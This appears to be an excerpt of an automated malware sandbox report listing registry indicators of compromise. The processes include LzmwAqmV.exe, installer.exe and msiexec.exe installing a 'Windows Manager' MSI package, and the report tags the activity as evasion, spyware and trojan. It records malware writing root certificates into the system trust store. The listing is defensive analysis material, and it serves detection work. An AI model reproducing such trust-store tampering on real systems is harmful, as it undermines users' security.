Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-911 = "Mauritius Daylight Time"	LzmwAqmV.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-591 = "Malay Peninsula Daylight Time"	LzmwAqmV.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	LzmwAqmV.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-402 = "Arabic Standard Time"	LzmwAqmV.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-431 = "Iran Daylight Time"	LzmwAqmV.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-832 = "SA Eastern Standard Time"	LzmwAqmV.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-522 = "N. Central Asia Standard Time"	LzmwAqmV.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-121 = "SA Pacific Daylight Time"	LzmwAqmV.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	LzmwAqmV.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	LzmwAqmV.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-12 = "Azores Standard Time"	LzmwAqmV.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-31 = "Mid-Atlantic Daylight Time"	LzmwAqmV.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-771 = "Montevideo Daylight Time"	LzmwAqmV.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-335 = "Jordan Standard Time"	LzmwAqmV.exe
Key deleted	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E	msiexec.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-212 = "Pacific Standard Time"	LzmwAqmV.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-531 = "Sri Lanka Daylight Time"	LzmwAqmV.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	LzmwAqmV.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-401 = "Arabic Daylight Time"	LzmwAqmV.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-82 = "Atlantic Standard Time"	LzmwAqmV.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-448 = "Azerbaijan Daylight Time"	LzmwAqmV.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-192 = "Mountain Standard Time"	LzmwAqmV.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-721 = "Central Pacific Daylight Time"	LzmwAqmV.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-332 = "E. Europe Standard Time"	LzmwAqmV.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-191 = "Mountain Daylight Time"	LzmwAqmV.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-384 = "Namibia Daylight Time"	LzmwAqmV.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-562 = "SE Asia Standard Time"	LzmwAqmV.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-11 = "Azores Daylight Time"	LzmwAqmV.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-752 = "Tonga Standard Time"	LzmwAqmV.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-111 = "Eastern Daylight Time"	LzmwAqmV.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-152 = "Central America Standard Time"	LzmwAqmV.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-692 = "Tasmania Standard Time"	LzmwAqmV.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-231 = "Hawaiian Daylight Time"	LzmwAqmV.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-631 = "Tokyo Daylight Time"	LzmwAqmV.exe

Modifies registry class 24 IoCs

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C414548CC3098124D97E31A29BF7FD26\InstanceType = "0"	msiexec.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C414548CC3098124D97E31A29BF7FD26\SourceList	msiexec.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C414548CC3098124D97E31A29BF7FD26\SourceList\Media	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C414548CC3098124D97E31A29BF7FD26\SourceList\LastUsedSource = "n;1;C:\\Users\\Admin\\AppData\\Roaming\\AW Manager\\Windows Manager 1.0.0\\install\\97FDF62\\"	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\C414548CC3098124D97E31A29BF7FD26\MainFeature	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C414548CC3098124D97E31A29BF7FD26\ProductName = "Windows Manager"	msiexec.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C414548CC3098124D97E31A29BF7FD26\Language = "1033"	msiexec.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C414548CC3098124D97E31A29BF7FD26\Assignment = "1"	msiexec.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C414548CC3098124D97E31A29BF7FD26\Version = "16777216"	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C414548CC3098124D97E31A29BF7FD26\ProductIcon = "C:\\Windows\\Installer\\{C845414C-903C-4218-9DE7-132AB97FDF62}\\logo.exe"	msiexec.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C414548CC3098124D97E31A29BF7FD26\SourceList\Net	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C414548CC3098124D97E31A29BF7FD26\SourceList\Media\1 = ";"	msiexec.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C414548CC3098124D97E31A29BF7FD26\Clients = 3a0000000000	msiexec.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\C414548CC3098124D97E31A29BF7FD26	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C414548CC3098124D97E31A29BF7FD26\PackageCode = "6BBF4B2F4524B25478C17BFBEE2559F7"	msiexec.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\5785CBDF4ABB5AD409841A692AF14EA9	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\5785CBDF4ABB5AD409841A692AF14EA9\C414548CC3098124D97E31A29BF7FD26	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C414548CC3098124D97E31A29BF7FD26\SourceList\PackageName = "Windows Manager - Postback Y.msi"	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C414548CC3098124D97E31A29BF7FD26\SourceList\Net\1 = "C:\\Users\\Admin\\AppData\\Roaming\\AW Manager\\Windows Manager 1.0.0\\install\\97FDF62\\"	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C414548CC3098124D97E31A29BF7FD26\SourceList\Media\DiskPrompt = "[1]"	msiexec.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C414548CC3098124D97E31A29BF7FD26	msiexec.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C414548CC3098124D97E31A29BF7FD26\AdvertiseFlags = "388"	msiexec.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C414548CC3098124D97E31A29BF7FD26\AuthorizedLUAApp = "0"	msiexec.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C414548CC3098124D97E31A29BF7FD26\DeploymentFlags = "3"	msiexec.exe

Modifies system certificate store 2 TTPs 13 IoCs

evasion spyware trojan

Install Root Certificate

T1130

Modify Registry

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43	installer.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 04000000010000001000000087ce0b7b2a0e4900e158719b37a893720f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa6090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030814000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f0b00000001000000120000004400690067006900430065007200740000001d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d43190000000100000010000000749966cecc95c1874194ca7203f9b6202000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2	installer.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 040000000100000010000000497904b0eb8719ac47b0bc11519b74d00f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030853000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c00b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e	Sun05ac1b0207d3ff3b8.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25	ZHazhulekema.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 040000000100000010000000d474de575c39b2d39c8583c5c065498a0f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a8090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703085300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc30b00000001000000120000004400690067006900430065007200740000001d00000001000000100000008f76b981d528ad4770088245e2031b630300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc25190000000100000010000000ba4f3972e7aed9dccdc210db59da13c92000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a	installer.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030853000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c00b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e	Sun05ac1b0207d3ff3b8.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 1900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f00000053000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e	Sun05ac1b0207d3ff3b8.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 0f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a8090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703085300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc30b00000001000000120000004400690067006900430065007200740000001d00000001000000100000008f76b981d528ad4770088245e2031b630300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc252000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a	ZHazhulekema.exe
